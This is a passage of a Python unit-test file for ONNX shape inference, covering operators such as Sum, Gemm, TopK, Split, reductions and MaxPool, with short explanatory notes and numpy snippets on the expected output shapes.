self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (2, 3, 1))])
def test_bitshift_broadcast_to_first(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (16, 4, 1)),
('y', TensorProto.UINT32, (1,))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (16, 4, 1))])
def test_bitshift_broadcast_to_second(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (1,)),
('y', TensorProto.UINT32, (2, 3, 1))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (2, 3, 1))])
def test_sum_single(self): # type: () -> None
self._identity_prop('Sum')
def test_sum_multi(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5)),
('z', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Sum', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (30, 4, 5))])
def test_sum_multi_broadcasting(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 1, 5)),
('y', TensorProto.FLOAT, ("a", 4, 1)),
('z', TensorProto.FLOAT, (4, "b"))],
[make_node('Sum', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (30, 4, 5))])
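Sum uses multidirectional (numpy-style) broadcasting across all of its inputs. Binding the symbolic dims to concrete values for illustration (an assumption: `'a' = 30`, `'b' = 5`), numpy's `broadcast_shapes` (numpy >= 1.20) reproduces the inferred result:

```python
import numpy as np

# (30, 1, 5), ('a', 4, 1), (4, 'b') with a=30, b=5; the rank-2 input is
# left-padded with 1s before the per-axis max is taken.
out_shape = np.broadcast_shapes((30, 1, 5), (30, 4, 1), (4, 5))
```

The result is `(30, 4, 5)`, matching the inferred shape of `out`.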
def test_sum_broadcasting_param(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ("a", 1, 5)),
('y', TensorProto.FLOAT, ("a", 4, 1))],
[make_node('Sum', ['x', 'y'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, ("a", 4, 5))])
def test_random_normal(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('RandomNormal', [], ['out'], dtype=TensorProto.DOUBLE, shape=(3, 4, 5))],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.DOUBLE, (3, 4, 5))])
def test_random_normal_like(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node('RandomNormalLike', ['X'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, 4))])
def test_random_normal_like_with_dtype(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node('RandomNormalLike', ['X'], ['out'], dtype=TensorProto.DOUBLE)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.DOUBLE, (2, 3, 4))])
def _logical_binary_op(self, op, input_type): # type: (Text, TensorProto.DataType) -> None
graph = self._make_graph(
[('x', input_type, (30, 4, 5)),
('y', input_type, (30, 4, 5))],
[make_node(op, ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def _logical_binary_op_with_broadcasting(self, op, input_type): # type: (Text, TensorProto.DataType) -> None
graph = self._make_graph(
[('x', input_type, (1, 5)),
('y', input_type, (30, 4, 5))],
[make_node(op, ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def test_logical_and(self): # type: () -> None
self._logical_binary_op('And', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('And', TensorProto.BOOL)
def test_logical_or(self): # type: () -> None
self._logical_binary_op('Or', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Or', TensorProto.BOOL)
def test_logical_xor(self): # type: () -> None
self._logical_binary_op('Xor', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Xor', TensorProto.BOOL)
def test_greater(self): # type: () -> None
self._logical_binary_op('Greater', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Greater', TensorProto.BOOL)
def test_less(self): # type: () -> None
self._logical_binary_op('Less', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Less', TensorProto.BOOL)
def test_equal(self): # type: () -> None
self._logical_binary_op('Equal', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Equal', TensorProto.BOOL)
def test_logical_not(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.BOOL, (30, 4, 5))],
[make_node('Not', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def test_less_or_equal(self): # type: () -> None
self._logical_binary_op('LessOrEqual', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('LessOrEqual', TensorProto.BOOL)
def test_greater_or_equal(self): # type: () -> None
self._logical_binary_op('GreaterOrEqual', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('GreaterOrEqual', TensorProto.BOOL)
def test_flatten(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (6, 20))])
def test_flatten_default_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 60))])
def test_flatten_zero_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (1, 120))])
def test_flatten_unknown_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'N', 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, 20))]) # type: ignore
def test_space_to_depth(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 100, 100))],
[make_node('SpaceToDepth', ['x'], ['z'], blocksize=b)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 300, 10, 10))])
def test_space_to_depth_unknown_dim(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'N', 100, 100))],
[make_node('SpaceToDepth', ['x'], ['z'], blocksize=b)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, None, 10, 10))]) # type: ignore
def test_depth_to_space(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 300, 10, 10))],
[make_node('DepthToSpace', ['x'], ['z'], blocksize=b, mode='DCR')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 3, 100, 100))])
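SpaceToDepth moves each `b x b` spatial block into the channel axis and DepthToSpace inverts it (the DCR/CRD mode affects element ordering, not shape). A sketch of the two shape rules the tests above exercise:

```python
# SpaceToDepth: (N, C, H, W) -> (N, C*b*b, H//b, W//b)
# DepthToSpace: (N, C, H, W) -> (N, C//(b*b), H*b, W*b)
b = 10
n, c, h, w = 2, 3, 100, 100
s2d = (n, c * b * b, h // b, w // b)
# Applying DepthToSpace to the SpaceToDepth result round-trips the shape.
d2s = (s2d[0], s2d[1] // (b * b), s2d[2] * b, s2d[3] * b)
```

`s2d` is `(2, 300, 10, 10)` and `d2s` recovers `(2, 3, 100, 100)`, matching both tests.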
def _rnn_forward(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (1, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize)],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 1, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (1, batchsize, hiddensize))])
def test_rnn_forward(self): # type: () -> None
self._rnn_forward(64, 32, 10, 4)
def _rnn_bidirectional(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (2, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (2, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize,
direction="bidirectional")],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 2, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (2, batchsize, hiddensize))])
def test_rnn_layout(self): # type: () -> None
self._rnn_layout(64, 32, 10, 4)
self._rnn_layout(64, 32, 10, 4, 'bidirectional')
def _rnn_layout(self, seqlen, batchsize, inpsize, hiddensize, direction='forward'): # type: (int, int, int, int, Text) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (batchsize, seqlen, inpsize)),
('w', TensorProto.FLOAT, (1, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize,
layout=1, direction=direction)],
[])
num_directions = 2 if direction == 'bidirectional' else 1
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (batchsize, seqlen, num_directions, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (batchsize, num_directions, hiddensize))])
def test_rnn_bidirectional(self): # type: () -> None
self._rnn_bidirectional(64, 32, 10, 4)
def _lstm_forward(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (1, 4 * hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, 4 * hiddensize, hiddensize))],
[make_node('LSTM', ['x', 'w', 'r'], ['all', 'hidden', 'last'], hidden_size=hiddensize)],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 1, batchsize, hiddensize)),
make_tensor_value_info('hidden', TensorProto.FLOAT, (1, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (1, batchsize, hiddensize))])
def test_lstm_forward(self): # type: () -> None
self._lstm_forward(64, 32, 10, 4)
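The RNN-family tests above share one shape convention (with the default `layout=0`; `layout=1` swaps the batch and sequence positions as in `_rnn_layout`): `X` is `(seq, batch, input)`, `W` stacks gates along dim 1 (so LSTM needs `4*hidden` rows where plain RNN needs `hidden`), and the outputs are fixed functions of those sizes. A sketch with a hypothetical helper:

```python
def rnn_output_shapes(seqlen, batch, hidden, num_directions=1):
    # Y: all hidden states; Y_h (and Y_c for LSTM): final state(s).
    all_h = (seqlen, num_directions, batch, hidden)
    last_h = (num_directions, batch, hidden)
    return all_h, last_h

fwd = rnn_output_shapes(64, 32, 4)
bidi = rnn_output_shapes(64, 32, 4, num_directions=2)
```

`fwd` reproduces the forward RNN/LSTM shapes and `bidi` the bidirectional ones inferred above.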
def test_topk_default_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'])],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,), (2,))])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5, 2)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 5, 2))])
def test_topk(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,), (2,))])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 2, 10)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 2, 10))])
def test_topk_raw_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,),
vals=np.array([3], dtype='<i8').tobytes(), raw=True)]) # Feed raw bytes (forcing little-endian byte order, as the ONNX standard requires) for test purposes
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 3, 10)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 3, 10))])
def test_topk_missing_k_value_output_rank_check(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10)),
('k', TensorProto.INT64, (1,))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (None, None, None, None)), # type: ignore
make_tensor_value_info('z', TensorProto.INT64, (None, None, None, None))]) # type: ignore
def test_gemm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (7, 5)),
('y', TensorProto.FLOAT, (5, 11)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transA(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 7)),
('y', TensorProto.FLOAT, (5, 11)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transA=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transB(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (7, 5)),
('y', TensorProto.FLOAT, (11, 5)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transB=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transA_and_transB(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 7)),
('y', TensorProto.FLOAT, (11, 5)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transA=1, transB=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
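Gemm computes `alpha * A' @ B' + beta * C`, where `A'`/`B'` are the optionally transposed inputs, so the output is always `(M, N)` with `M` the rows of `A'` and `N` the columns of `B'`. The transA/transB variants above all collapse to the same `(7, 11)`:

```python
import numpy as np

a = np.zeros((5, 7), dtype=np.float32)   # transA=1: effective A' is (7, 5)
b = np.zeros((11, 5), dtype=np.float32)  # transB=1: effective B' is (5, 11)
out = a.T @ b.T                          # (7, 5) @ (5, 11)
```

The product has shape `(7, 11)`; the bias `C` only broadcasts into that shape and never changes it, which is why `z` can have shape `None` in the tests.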
def test_gemm_no_bias(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (13, 7)),
('y', TensorProto.FLOAT, (7, 17))],
[make_node('Gemm', ['x', 'y'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (13, 17))])
def test_reduce_op_shape_2_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(1, 2), keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24,))])
def test_reduce_op_shape_keep_dims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(1, 2), keepdims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24, 1, 1))])
def test_reduce_op_shape_default_value(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 1, 1))])
def test_reduce_op_shape_no_axes_do_not_keep_dims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, tuple())])
def test_reduce_op_shape_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(-1, -2))],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24, 1, 1))])
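The ReduceL1 tests above follow numpy reduction shape rules: reduced axes are dropped when `keepdims=0` and kept as size 1 when `keepdims=1`, negative axes count from the back, and omitting `axes` reduces everything. A numpy check of each case:

```python
import numpy as np

x = np.zeros((24, 4, 11), dtype=np.float32)
drop = np.sum(np.abs(x), axis=(1, 2), keepdims=False).shape
keep = np.sum(np.abs(x), axis=(1, 2), keepdims=True).shape
neg = np.sum(np.abs(x), axis=(-1, -2), keepdims=True).shape
scalar = np.sum(np.abs(x), keepdims=False).shape
```

These give `(24,)`, `(24, 1, 1)`, `(24, 1, 1)`, and `()` respectively, matching the four inferred shapes.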
def test_argmax_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=1, keepdims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (24, 1, 11))])
def test_argmax_shape_keepdims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=0, keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (4, 11))])
def test_argmax_shape_default_value(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (1, 4, 11))])
def test_argmax_shape_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=-2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (24, 1, 11))])
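ArgMax reduces exactly one axis and always yields integer indices (INT64 in ONNX); `keepdims` controls whether that axis survives as size 1, and a negative axis counts from the back (`-2` on rank 3 is axis 1). A numpy sketch of the two shape outcomes:

```python
import numpy as np

x = np.zeros((24, 4, 11), dtype=np.float32)
# keepdims=0 drops the reduced axis entirely.
dropped = np.argmax(x, axis=0).shape
# keepdims=1 keeps it as size 1 (emulated here via expand_dims for
# compatibility with older numpy versions).
kept = np.expand_dims(np.argmax(x, axis=1), axis=1).shape
```

`dropped` is `(4, 11)` and `kept` is `(24, 1, 11)`, matching the inferred shapes above.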
def test_dropout(self): # type: () -> None
graph = self._make_graph(
[('data', TensorProto.FLOAT, (3, 4, 5,)),
('ratio', TensorProto.FLOAT, ())],
[make_node('Dropout', ['data', 'ratio'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5,))])
def test_LRN(self): # type: () -> None
self._identity_prop('LRN', alpha=0.5, beta=0.5, size=1)
def test_batch_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('mean', TensorProto.FLOAT, (4,)),
('var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'mean', 'var'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_split_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4))],
[make_node('Split', ['x'], ['y', 'z'], axis=-1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2)),
make_tensor_value_info('z', TensorProto.FLOAT, (2, 2))])
def test_split_with_split_attribute(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4)),
('split', TensorProto.INT64, (2,))],
[make_node('Split', ['x', 'split'], ['y', 'z'], axis=1)],
[],
initializer=[make_tensor('split', TensorProto.INT64, (2,), (3, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3)),
make_tensor_value_info('z', TensorProto.FLOAT, (2, 1))])
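Split's shape rule, sketched with a hypothetical helper: an explicit `split` tensor gives the sizes along `axis` directly, while with no `split` input the axis is divided evenly among the outputs (assuming it divides exactly, as in these tests):

```python
def split_sizes(dim, num_outputs, split=None):
    # Explicit sizes win; otherwise split the axis evenly.
    if split is not None:
        return list(split)
    assert dim % num_outputs == 0
    return [dim // num_outputs] * num_outputs

explicit = split_sizes(4, 2, split=(3, 1))  # test_split_with_split_attribute
even = split_sizes(4, 2)                    # test_split_negative_axis
```

`explicit` is `[3, 1]` and `even` is `[2, 2]`; when the split dim is symbolic (as in the unknown-split-dim test) the per-output sizes cannot be checked against it and are emitted as `None`.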
def test_split_with_split_attribute_unknown_split_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'a', 'b')),
('split', TensorProto.INT64, (2,))],
[make_node('Split', ['x', 'split'], ['y', 'z'], axis=1)],
[],
initializer=[make_tensor('split', TensorProto.INT64, (2,), (3, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, None, 'b')), # type: ignore
make_tensor_value_info('z', TensorProto.FLOAT, (2, None, 'b'))]) # type: ignore
def test_split_from_GLU(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7))])
def test_GLU_partial(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1),
make_node('Sigmoid', ['z'], ['a'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('a', TensorProto.FLOAT, (5, 3, 7))])
def test_GLU(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1),
make_node('Sigmoid', ['z'], ['a']),
make_node('Mul', ['y', 'a'], ['b'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('a', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('b', TensorProto.FLOAT, (5, 3, 7))])
def test_softmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('Softmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_softmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('Softmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_hardmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('Hardmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_hardmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('Hardmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_logsoftmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('LogSoftmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_logsoftmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('LogSoftmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_logsoftmax_3d_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('LogSoftmax', ['x'], 'z', axis=-1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_maxpool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_maxpool_with_indices(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y", "Z"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3)),
make_tensor_value_info("Z", TensorProto.INT64, (5, 3, 3, 3))])
def test_maxpool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_maxpool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_maxpool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_maxpool_with_floor_mode(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (32, 288, 35, 35))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], strides=[2, 2], ceil_mode=False)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (32, 288, 17, 17))])
def test_maxpool_with_ceil_mode(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (32, 288, 35, 35))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (32, 288, 18, 18))])
def test_maxpool_ceil(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (1, 1, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[3, 3], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (1, 1, 2, 2))])
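# The explicit-padding pool tests above all follow the standard output-size rule.
# Hedged sketch (helper name `_pool_out_size` is ours, not part of this suite):
# output = floor_or_ceil((in + pad_total - dilation*(kernel-1) - 1) / stride) + 1.
def _pool_out_size(in_size, kernel, stride=1, pad_total=0, dilation=1, ceil_mode=False):
    # effective kernel extent once dilation is applied
    eff = dilation * (kernel - 1) + 1
    num = in_size + pad_total - eff
    if ceil_mode:
        return -(-num // stride) + 1  # ceil division
    return num // stride + 1
# e.g. the floor/ceil pair above: _pool_out_size(35, 2, 2) -> 17,
# _pool_out_size(35, 2, 2, ceil_mode=True) -> 18.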
def test_maxpool_with_dilations(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], kernel_shape=[2, 2], dilations=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
